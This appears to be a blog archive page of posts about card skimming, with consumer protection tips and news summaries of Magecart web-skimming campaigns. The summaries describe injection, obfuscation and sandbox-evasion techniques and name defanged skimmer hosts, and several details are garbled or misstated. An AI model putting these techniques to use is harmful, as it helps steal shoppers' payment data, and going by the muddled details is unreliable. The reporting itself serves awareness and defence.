Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Card Skimming. Show all posts

Taking Measures to Prevent Card Skimming and Shimming

Protecting your financial information is crucial in the digital era we live in today. Credit card skimming and shimming have grown to be serious risks to customers all around the world with the emergence of sophisticated cybercrime techniques. Maintaining your financial stability depends on your ability to recognize and resist these approaches.

Credit card skimmers, according to PCMag, are deceptive gadgets installed on legal card readers, such as ATMs or petrol pumps, with the purpose of capturing and storing your card information. Cybercriminals have adapted by utilizing shimmers, which are extremely thin devices inserted into the card reader slot, according to KrebsOnSecurity, which cautions that even with the switch to chip-based cards, they have done so. These shimmers allow them to intercept the data from the chip.

The Royal Canadian Mounted Police (RCMP) provides valuable insights into how criminals install skimmers. They often work quickly and discreetly, making it hard for victims to notice. They may place a fake card reader on top of the legitimate one or install a small camera nearby to capture PIN numbers.

To protect yourself, it's important to be vigilant. MakeUseOf suggests a few key steps:

  • Inspect the Card Reader: Before using an ATM or a card reader at a gas pump, take a moment to examine the card slot. Look for any unusual devices or loose parts.
  • Cover Your PIN: Use your hand or body to shield the keypad as you enter your PIN. This simple step can prevent criminals from capturing this crucial piece of information.
  • Monitor Your Accounts: Regularly review your bank and credit card statements for any unauthorized transactions. Report any suspicious activity to your bank immediately.
  • Choose ATMs Wisely: Whenever possible, use ATMs located in well-lit, high-traffic areas. Avoid standalone ATMs in secluded or poorly monitored locations.
  • Stay Informed: Keep up-to-date with the latest scams and techniques used by cybercriminals. Knowledge is your best defense.
Remaining vigilant and well-informed is your primary defense against credit card skimmers and shimmers. By adopting these practices and staying aware of your surroundings, you can significantly reduce the risk of falling victim to these insidious forms of cybercrime. Remember, your financial security is well worth the extra effort.


Here's How to Safeguard Your Credit Card Info

 

Sure, you recognise a phishing email (even if your parents don't). Unfortunately, thieves are constantly coming up with new ways to get unauthorised access to credit card information, leaving you with financial losses and emotional distress. While hackers demonstrate their limitless creativity, the old means of defrauding do not appear to be fading away. 

Here's what you need to know about the different ways your credit card information might be stolen so you can safeguard your financial well-being. 

Phishing scam

One of the most common ways to get credit card information continues to be phishing. You may be duped into providing your credit card information by cybercriminals who send false emails, messages, or fake websites that appear to be legitimate companies. If you refrain from your research before responding to a suspicious phishing email, you can end up "confirming your identity" with a hacker. 

The following are some effective anti-phishing strategies: Never click on shady links or give confidential information to an unknown. When confirming an email's legitimacy, double-check the sender's address. There is no chance that your bank will get in touch with you through Gmail. 

Card skimming

Yes, ATM card skimming still occurs in the digital era. When fraudsters install devices on ATMs, petrol pumps or point-of-sale terminals to steal credit card information from unknowing victims, this is called card skimming. These devices can be hard to find, and the information obtained from them is later utilised to make cloned cards or make online payments.

You should check card readers for signs of manipulation, cover your hand when entering your PIN, utilise ATMs that are located in secure, well-lit places, and use mobile pay or tap to pay whenever feasible to protect yourself against card skimming. 

Breach of confidentiality 

Data breaches occur when hackers secure access to a company's systems and steal critical consumer information, such as credit card information. Unfortunately, these breaches are prevalent and can impact even major, well-known companies. Cybercriminals may then sell or utilise this information for fraudulent transactions on the dark web. 

Check for data breach notifications from firms with which you have accounts on a regular basis, and use two-factor authentication whenever possible. If you learn that your information has been exposed as a result of a data breach, you should change your password on any sites where you use the same login information—and avoid reusing passwords! 

Physical thievery 

With all of the modern tools of theft to be aware of, we must not overlook good old-fashioned pickpocketing. Even losing your wallet or purse can expose your credit card information, especially if the criminal watched you enter your PIN at the ATM before robbing you. If your card is lost or stolen, don't put it off: notify your bank right away to limit the damage. 

The bottom line when it comes to avoiding credit card fraud is to be attentive, practise good security habits, and constantly examine your financial statements to discover any strange activity as soon as possible. The best line of defence against credit card theft is to be vigilant and knowledgeable.

Online Thieves Target Legitimate Ecommerce CCTSites to Steal Credit Cards

 

In a recent Magecart credit card theft campaign, legitimate websites are taken over and used as "makeshift" command and control (C2) servers to inject and conceal skimmers on selected eCommerce sites.

An online store breached by hackers to insert malicious scripts that steal customers' credit cards and personal information while they are checking out is known as a "Magecart attack." 

The United States, the United Kingdom, Australia, Brazil, Peru, and Estonian organisations have all been penetrated, according to Akamai researchers following this campaign.

A further indication of the stealthiness of these attacks, according to the cybersecurity firm, is the fact that many victims haven't been aware they've been compromised for more than a month. 

Exploiting legitimate sites 

The initial step taken by the attackers is to find trustworthy websites that are vulnerable and hack them to host their malicious code and function as C2 servers for their attacks. 

Threat actors avoid detection and blockades and are spared from having to build up their own infrastructure by disseminating credit card skimmers through reputable, legal websites. 

The next step taken by the attackers is to insert a short JavaScript snippet into the target e-commerce websites that retrieves the malicious code from the previously compromised websites.

"Although it is unclear how these sites are being breached, based on our recent research from similar, previous campaigns, the attackers will usually look for vulnerabilities in the targeted websites' digital commerce platform (such as Magento, WooCommerce, WordPress, Shopify, etc.) or in vulnerable third-party services used by the website," researchers explained in the report. 

To enhance the attack's stealthiness, the threat actors developed the skimmer's structure to mimic that of Google Tag Manager or Facebook Pixel, which are well-known third-party services that are unlikely to draw attention. Base64 encoding also hides the host's URL. 

Data theft details 

Akamai claims to have observed two different skimmer iterations being used in the specific campaign. 

A number of CSS selectors that target consumer PII and credit card information are included in the initial version, which is highly obscured. For each site that was targeted, a different set of CSS selectors was created specifically for that victim. 

The second skimmer variant's lack of security allowed indicators in the code to be exposed, which allowed Akamai to map the campaign's distribution and identify more victims.

The data is sent to the attacker's server via an HTTP request formed as an IMG tag inside the skimmer after the skimmers steal the customers' personal information. The data also has a layer of Base64 encoding to obscure the transmission and lessen the chance that the victim will notice the breach. 

By safeguarding website admin accounts effectively and updating their CMS and plugins, website owners may fend off Magecart invasions. By adopting electronic payment methods, virtual cards, or restricting how much can be charged to their credit cards, customers of online stores can reduce the danger of data exposure.

Amazon Bans Flipper Zero for Being a Card Skimming Tool

 

The Flipper Zero portable multi-tool for pen testers is no longer available for purchase on Amazon as the company has designated it as a card-skimming device, prohibiting its sale on the platform. 

According to Pavel Zhovner, CEO of Flipper Devices, the company asked Amazon to reconsider the prohibition because the gadget cannot skim bank cards. 

The Flipper Zero is a small, mobile, programmable pen-testing device that may assist in experimenting with and debugging a variety of digital and physical devices via many protocols, including RFID, radio, NFC, infrared, Bluetooth, and others.

Since its release, users have demonstrated Flipper Zero's skills by showing how it can ring doorbells, perform replay assaults to unlock cars and open garage doors, and copy a variety of digital keys. 

Flipper Zero has now been blocked by Amazon, which has labelled it as a "restricted product," according to notices distributed to vendors on Thursday evening.

On the Amazon Seller Central website, card-skimming tools are listed next to key-copying tools and shoplifting tools like sensormatic detachers under the restricted product category for lock picking and theft devices. 

There are currently some dead links to previously accessible Amazon pages that sold Flipper Zero tools, with the message "sorry, we couldn't find that page." 

At this time, Flipper Zero offerings on Amazon are limited to accessories like silicone cases, screen protectors, and WiFi Devboards.

"This product has been identified as a card skimming device. Amazon policy prohibits the sale or listing of card skimming devices," reads a notification sent to one Amazon seller confirming a Flipper Zero sell page was removed from Amazon's catalogue."

"We took this action because this product is not permitted for sale on Amazon.com. It is your obligation to make sure the products you offer comply with all applicable laws, regulations, and Amazon's policies."

The firm also issued a warning to Flipper Zero merchants, advising them to review all of their other items and delete any other prohibited products within 48 hours, failing which their accounts would be deactivated. 

"Within 48 hours of this warning please review your listings and close, delete, or archive any listings that do not comply with all applicable laws, regulations, and Amazon's policies. Failure to properly close or delete all restricted product listings from your inventory may result in the deactivation of your selling account, and funds may be permanently held." 

The Amazon prohibition won't bother all of Flipper Zero's potential customers, though, because those who sold it there were doing so at a premium. You can still purchase a Flipper Zero through the manufacturer's official store, which is frequently restocked. 

On the basis of its claimed use by criminals, the Brazilian National Telecommunications Agency has also been confiscating incoming Flipper Zero purchases. Brazilians who purchased the devices claim that all certification attempts have been refused by the government agency.

Microsoft: Credit Card Stealers are Switching Tactics to Conceal the Attack

 

Attackers are manipulating e-commerce checkout websites and capturing payment card information by utilising picture files with a concealed malicious PHP script. According to Microsoft, card-skimming malware is increasingly employing malicious PHP scripts on web servers to modify payment sites and circumvent browser safeguards activated by JavaScript code. 

Card-skimming malware has changed its approach, according to Microsoft threat analysts. Card skimming has been dominated over the past decade by the so-called Magecart malware, which uses JavaScript code to inject scripts into checkout pages and transmit malware that grabs and steals payment card information. Injecting JavaScript into front-end processes was very conspicuous, according to Microsoft, because it might have triggered browser defences such as Content Security Policy (CSP), which prevents external scripts from loading. 

By attacking web servers with malicious PHP scripts, attackers discovered a less noisy method. In November 2021, Microsoft discovered two malicious image files on a Magento-hosted server, one of which was a fake browser favicon. Magento is a well-known e-commerce system. The images included an embedded PHP script, which did not run on the compromised web server by default. Instead, in order to only target shoppers, the PHP script only starts after validating via cookies that the web admin is not currently signed-in. 

The PHP script obtained the current page's URL and looked for the keywords "checkout" and "one page," which are linked to Magneto's checkout page. "The insertion of the PHP script in an image file is interesting because, by default, the webserver wouldn't run the said code. Based on previous similar attacks, we believe that the attacker used a PHP 'include' expression to include the image (that contains the PHP code) in the website's index page, so that it automatically loads at every webpage visit," Microsoft explained. 

Malicious PHP is increasingly being used in card-skimming malware. Last week, the FBI issued a warning about new examples of card-skimming attackers infecting US business checkout sites with web shells for backdoor remote access to the webserver using malicious PHP. Sucuri discovered that PHP skimmers targeting backend web servers were responsible for 41% of new credit card-skimming malware discovered in 2021. Magecart Group 12 is distributing new web shell malware, according to Malwarebytes, that dynamically loads JavaScript skimming code via server-side requests to online merchants. 

Malwarebytes' Jérôme Segura noted, "This technique is interesting as most client-side security tools will not be able to detect or block the skimmer. Unlike previous incidents where a fake favicon image was used to hide malicious JavaScript code, this turned out to be a PHP web shell."    

However, dangerous JavaScript is still used to skim cards. Card-skimming malware based on JavaScript spoofing Google Analytics and Meta Pixel (previously Facebook Pixel) scripts, for example, was discovered by Microsoft.

WooCommerce Credit Card Stealer Found Implanted in Fake Images

 

Card skimming and card details theft is one such sophisticated technique attack that seldom fails. Earlier this week, cybersecurity researchers at Sucuri blog unmasked a malicious campaign where a credit card swiper was injected into WordPress’ wp-settings.php file. The WooCommerce customers reported that images were disappearing from the cart almost as soon as they were uploaded. 

According to researchers, the credit card skimmer was buried deep down into the file titled '../../Maildir/sub.main', and it was easy to miss on a casual review. Scammers usually prefer to deploy malicious content out of the way so it is more difficult to detect. The common tactic employed is to create directories that look like system directories, or to place malware in existing core CPanel or other server directories. 

Upon analyzing the malicious file, researchers uncovered over 150 lines of code that had been obfuscated with str_rot13 and base64. Attackers also used multiple functions to store credit card data concealed in the wp-content/uploads/highend/dyncamic.jpg image file. When decoded, that data revealed not only credit card details submitted to the site, but also admin credentials to the site’s backend. 

Injecting card skimmers into WordPress plugin files is the newest trend, avoiding the heavily watched ‘wp-admin’ and ‘wp-includes’ core folders, where most injections are short-lived. It is one of the most lucrative and stealth attack tactics employed by scammers to make money. 

There are a couple reasons why this is a useful tactic. The primary reason is that it makes it very easy for scammers to download the stolen details in their browser or a console. Secondly, most website/server malware detection scans focus on website file extensions such as PHP, JS, and HTML. Image files, particularly those in a wp-content/uploads sub-directories, can sometimes be overlooked.

“Scammers are aware that most security plugins for WordPress contain some way to monitor the file integrity of core files (that is, the files in wp-admin and wp-includes directories). This makes any malware injected into these files very easy to spot even by less experienced website administrators. The next logical step for them would be to target plugin and theme files,” researchers explained.

Payment Card Skimming Resurfaces with an Internet Twist

 

Card skimming has existed prior to the mainstream internet and is experiencing a revival as financial fraudsters recognise new potential to combine physical world data theft with online intrusion to steal even more money and information than ever. Only a week ago, it was announced that over 500 online retail sites were victims of a large "card skimming" incident, in which threat actors placed a device that allowed them to duplicate and steal the data from valid debit and credit cards as they were used for purchases. 

Card skimming fraudsters used to implant a physical device into ATMs or payment terminals to steal information from genuine consumers' payment cards. Nowadays, since online shopping is more popular than ever, cyber thieves are utilising malware placed into the checkout pages of online commerce sites to acquire credit card information, which they can then resell or use in their own nefarious schemes. 

Sansec, a malware and vulnerability detection firm that works with over 7,000 online retailers, was among the first to notice this fraudulent card skimming activity earlier this month. The vendor proposes "cleaning" the affected retail sites in order to remove the harmful code, but experts fear that these cyber-skimmers may just shift their strategy and look for "backdoors" through which they can implement their viruses. 

Many of these new card-skimming attacks, as well as other card information theft tactics where the card is not physically present at the moment of transaction, have been linked to the Magecart cybercriminal gang. Furthermore, if mobile phones begin to have card readers, this situation may worsen. 

The cybersecurity firm was able to speak with the administrators of the hijacked websites, according to another report by Ars Technica. They noticed that the hackers used a SQL injection flaw as well as a PHP object injection attack. Both were apparently using Quickview, a Magento 2 extension that allows buyers to quickly view product information without having to load the listings. 

The hackers were able to add an additional validation rule to the customer_eav_attribute table by misusing the Magento plugin. Furthermore, the credit card skimming group injected a payload onto the site. In order for the code to run successfully, the hackers must first "unserialize" the data on Magento. They would then log in as a new guest on the website.

Credit Cards Were Forged from a Prominent e-Cigarette Store

 

Since being breached, Element Vape, a famous online retailer of e-cigarettes including vaping kits, is harboring a credit card skimmer on its website. In both retail and online storefronts in the United States and Canada, this retailer provides e-cigarettes, vaping equipment, e-liquids, and Synthetic drugs.
 
Its website Element Vape is uploading a potentially Malicious file from either a third-party website that appears to be a credit card stealer. Magecart refers to threat actors who use credit card cybercriminals on eCommerce sites by infiltrating scripts. 

On numerous shop webpages, beginning with the homepage, a mystery base64-encoded script may be seen on pages 45-50 of the HTML source code. For an unknown period of time, the computer worm has so far been present on ElementVape.com. 

This code was gone as of February 5th, 2022, and before, according to a Wayback Machine review of ElementVape.com. As a result, the infection appears to have occurred more recently, probably after the date and before today's detection. When decoded, it simply fetches the appropriate JavaScript file from a third-party site :

/weicowire[.]com/js/jquery/frontend.js

When this script was decoded and examined, it was apparent – the collection of credit card and invoicing information from clients during the checkout. The script looks for email addresses, payment card details, phone numbers, and billing addresses (including street and ZIP codes). 

The attacker acquires these credentials via a predefined Telegram address in the script which is disguised. The code also has anti-reverse-engineering features which check if it's being run in a sandbox or with "devtools" to prevent it from being examined.

It's unclear how the backend code of ElementVape.com was altered in the first place to allow the malicious script to enter. Reportedly, this isn't the first instance Element Vape's security has been breached. Users reported getting letters from Element Vape in 2018 indicating the company had a data breach so the "window of penetration between December 6, 2017, and June 27, 2018, might have revealed users" personal details to threat actors. 

Target Reveals Its Personal Skimming Detection Tool


Web skimming is a major problem for e-commerce shops and websites over the past few years. The attacks include simple script injections into payment platforms and breaches of genuine third-party services and scripts. Often referred to as Magecart attacks, these have become one of the leading reasons for card-not-present (CNP) fraud and affect small and big brands in the same manner, and also impact e-commerce platforms. Top e-commerce retailers, Target went in solutions a few years back to deal with this problem and keep their customers safe when shopping on the Target website.
 
As there were not many ready-to-detect tools for these attacks back then, two computer security experts thought about making one. After going live and in use for more than three years, Target.com company's client-side scanner has now been issued as an open-source project named Merry Maker. Merry Maker constantly affects online surfing and executes test transactions to scan for any harmful code. 

Merry Maker works as a guest on Target.com by executing various general tasks that include online purchases. In this process, the tool stores and analyzes various types of information which includes network requests, browser activity, and JavaScript files to check for any suspicious activity. 

About Card Skimming 

Card skimming is an attack where a harmful device is deployed at the point of authorized transaction to steal financial credentials. In the real world, skimming devices are attached to the card slots of ATMs or gas pump payment platforms to store data encrypted on the card's magnetic stripe. These generally come with a PIN pad or small cameras that plans to steal PINs types by users. 

These chip-based cards use encryption along with other transaction authentication and verification features are meant to challenge such types of card attacks. "Web skimming groups use sophisticated techniques to make their keylogging code hard to detect. The code can be heavily obfuscated and added to existing JavaScript files or even stored in other types of resources such as CSS or even embedded into images or it can be hosted on third-party domains," writes CSO.

To Stay Under the Radar, Magecart Credit Card Skimmer Avoids VMs

 

A new Magecart threat actor is utilizing a digital skimmer to steal people's payment card information from their browsers. It uses a unique kind of evasion to circumvent virtual machines (VM) so it only targets actual victims and not security researchers. Researchers from Malwarebytes found the new campaign, which adds an extra browser process that checks a user's PC for VMs using the WebGL JavaScript API, according to a blog post published Wednesday. 

It accomplishes this by determining whether the operating system's graphics card driver is a software renderer fallback from the hardware (GPU) renderer. The skimmer is searching for the words swiftshader, llvmpipe, and VirtualBox in the script. SwiftShader is used by Google Chrome, while llvmpipe is used by Firefox as a backup renderer. 

 “By performing this in-browser check, the threat actor can exclude researchers and sandboxes and only allow real victims to be targeted by the skimmer,” Malwarebytes Head of Threat Intelligence Jérôme Segura wrote in the post. 

Magecart is an umbrella term for various threat organizations that infect e-commerce websites with card-skimming scripts on checkout pages in order to steal money and personal information from customers. Because security researchers are so familiar with their activities, they are always seeking new and inventive ways to avoid being detected. 

The most frequent way for evading detection, according to Segura, is detecting VMs used by security researchers and sandboxing solutions that are intended to pick up Magecart activity. "It is more rare to see the detection of virtual machines via the browser for web-based attacks," he said. Threat actors typically filter targets based on geolocation and user-agent strings, according to Segura. 

Researchers discovered that if the machine passes the check, the process of personal data exfiltration can proceed regularly. The customer's name, address, email, phone number, and credit card information are all scraped by the skimmer. “It also collects any password (many online stores allow customers to register an account), the browser’s user-agent, and a unique user ID. The data is then encoded and exfiltrated to the same host via a single POST request,” said Segura. 

To help consumers avoid being targeted and compromised by the campaign, Malwarebytes has released the skimmer code as well as a thorough list of indicators of compromise in its post.

Stolen Card Validation Service Illuminated A New Corner of the Skimming Ecosystem

 

In the recent analysis, experts discovered that the digital credit card skimming ecosystem evolves as experts identify new players, tooling, services, and economies that make it up in much of the recent threat infrastructure studies. Experts also noticed that significant patterns emerge in the infrastructure that these groups utilize and share. 

Many domains used for digital skimming and other criminal activities have been hosted on Alibaba IP space in recent years. Because bulletproof hosting companies host a large percentage of skimming campaigns, Alibaba IP space's popularity could be due to one of these bulletproof services exploiting Alibaba hosting services. Some of these domains have recently been accused of abusing Google's user content hosting service. 

While looking into the MobileInter skimmer's infrastructure, the analysts discovered that one of its skimmer domains was temporarily hosted by a Google IP address. This IP then hosted a domain that offered card skimmers a useful service that allowed them to validate stolen payment data for a fee. The experts were able to discover multiple associated websites, services, and social media accounts connected to this authentication activity known as bit2check using RiskIQ's Internet Intelligence Graph. Some bit2check names have been spotted abusing Alibaba and Google hosting services in the same way as that of Magecart domains.

Following additional investigation, the analysts discovered that the person behind bit2check is a Kurdish actor who goes by the name Hama. There was no apparent relationship between an individual and the bulletproof hosting operation seen on Alibaba. On the other hand, this connection could lead to more information about who is providing these malicious hosting services. 

The bit2check website advertises a bit2check Telegram group and promotes itself as the "greatest CVV/cc checker in town." Many Kurdish language telegram channels also link to the bit2check site and others, including bin-checker[.]net, which is a free version of bit2check. These card-skimming services promote each other through links on their websites and Telegram channels. 

The domains and accounts linked to Hama are also associated with the activities of other players in the carding sector. Code produced by another actor known as namso can be seen on some of Hama's websites. A directory called namso_files can be found in Hama's Github source. 

Since RiskIQ first reported on Magecart in 2016 and its historic attack against British Airways in 2018, they have been investigating browser-based card skimming. 

Bit2check is another part of this vast ecosystem that caters to skimmers looking to validate their loot or buy more stolen information. Many of the companies in this ecosystem network, both the skimmers and the services that cater to them, are using the same strategies and infrastructure, according to RiskIQ.

Outdated Magneto 1 Witnessed Credit Card Skimming Threats

 

Magento is an open-source code e-commerce site that supplies online traders with a scalable shopping cart system, and managing their online store's layout, content, and features. Lately, threat actors began leveraging a flaw in the ‘Magento 1’ branch that has not been managed any longer in the fall of 2020. 

Thousands of retailers worldwide on the platform are encouraged to upgrade the mobile version to ‘Magento 2’, as thousands of e-commerce shops were hacked with the credit card skimming code infecting all of them. During the tracking of events related to the ‘Magento 1’ initiative, observably, an e-commerce shop was attacked twice by skimmers. 

In this particular incident, the threat actors devised a copy of their writings that is well-known to places that were already injected by the Magento 1 skimmer. The second skimmer will now actually collect the credit card data from the pre-existing fake form which were previously injected by the actors.

"A large number of Magento 1 sites have been hacked but yet are not necessarily being monetized,” as stated by the researcher at Malwarebytes. He further added that “Other threat actors that want access will undoubtedly attempt to inject their own malicious code. When that happens, we see criminals trying to access the same resources and sometimes fighting with one another.” 

The end-of-life of Magento 1, paired with a famous feat, was an immense blessing for the actors at risk. Many pages were indiscriminately compromised merely because they were weak. RiskIQ has allocated these cases to Magecart Group 12, which uses diverse tactics including chain threats with a long history of web skimming.

On the payment websites of Costway, one of the leading retailers in North America and Europe, two web skimmers have been found selling appliances, furniture, etc. The skimmers seek to provide payment information with consumers' credit card. “Our crawlers identified that the websites for Costway France, U.K., Germany, and Spain, which run the Magento 1 software, had been compromised around the same time frame,” said researchers. 

On the Costway check-out page, the researchers noticed the credit card skimmer injection, which stands out in English while the majority of the platform is in French. This is no surprise considering the automated and very indiscriminate Magento 1 hacking campaign. 

The threat to victims is huge, as scientists claim that just in December 2020, Costway's French portal (Costway[.]fr) received approximately 180K tourists. There is also a second skimmer (loaded from the securityxx[.]top externally) on the web which targets the skimmer of Magento 1. 

Many Magento 1 websites have been compromised, but they are not monetized yet. Additional attacks would certainly continue to inject their own malicious code.

More than 17,000 Domains Affected with Code which Steals Card Data



Cybercriminals running Magecart operations have added payment card skimming code to more than 17,000 domains with JavaScript files in misconfigured Amazon S3 buckets.

Cybercriminals exploited the lack of access control in Amazon's cloud storage services and affected over 17,000 domains via automated attacks which reconstructed JavaScript code randomly, without monitoring if the code could load a payment page.

The exploit came as a part of Megacart operations, originated in the month of April; attackers injected payment card skimming code to a high number of domains with JavaScript files in poorly configured Amazon S3 buckets which granted writing permissions to the person finding them.

According to the security researchers at RiskIQ, the discovery of these S3 buckets had been automated by the authors of the campaign.

Referencing from the findings made by Yonathan Klijnsma, RiskIQ's head of threat research, "Once the attackers find a misconfigured bucket, they scan it for any JavaScript file (ending in .js). They then download these JavaScript files, append their skimming code to the bottom, and overwrite the script on the bucket."

"Even if your bucket has information that anyone can access, it does not mean everyone should be able to modify the content," he added.

The fact that a large number of websites employing Amazon's cloud storage services fell short in fortifying access to the corresponding assets played a major role for Magecart campaign in realizing its malicious objectives.

Cybercriminals Preferring Audio Skimmers Over Flash Skimmers






There has been a rapid increase in the number of web skimming attacks since the advancements in the technological sector; it also resulted in excessive activity in the black market of physical card skimming tools.
Web skimming attacks are designed to capture critical financial data and card details like the name of the holder and sensitive numbers. It is when attackers connect their spying tool to a point-of-sale system (PoS) or an ATM in order to get access to the data that is processed from credit/debit cards via these machines.
The ever evolving ways of web skimming are one of the reasons why it is thriving and remains undetected,  professionals skimmers have formed closed communities which are organized to coordinate during skimming processes and assist the cashers, decoders, engineers, extractors, and vendors with whatever they need.
Advanced Intelligence, a New York based fraud prevention company reported that the usual targets are gas stations, ATMs or PoS terminals. Skimming includes unauthorized access to sensitive financial information for which the cybercriminals mainly rely on upgrades and advancements in technology to produce and circulate products which are unassailable and undetectable.
Another variant includes Audio Skimmers, which have been known to exist since 2010 and the technique employed in Audio Skimming is said to be existing since 1992. The devices involved store the data and encrypt it to capture it in MP3 format. The threat rate of Audio Skimmers multiplies with the camera attached to capture the PIN number and acting as a video skimmer.
Commenting on the matter, Yelisey Boguslaskiy, director of security research at AdvIntel, said, "They use timing-calculating algorithms to “reed” the audio when the card is been scanned by the ATM, which allows them to decode a track in 1-2 seconds and immediately convert it into text format,"
"Russian-speaking real carding communities have traditionally been exclusive and tight-lipped regarding their skimming operations. Skimming developers form exclusive trusted underground criminal networks thereby connecting talented engineers, their trusted sellers, and wealthy carder buyers of such tools,” further added.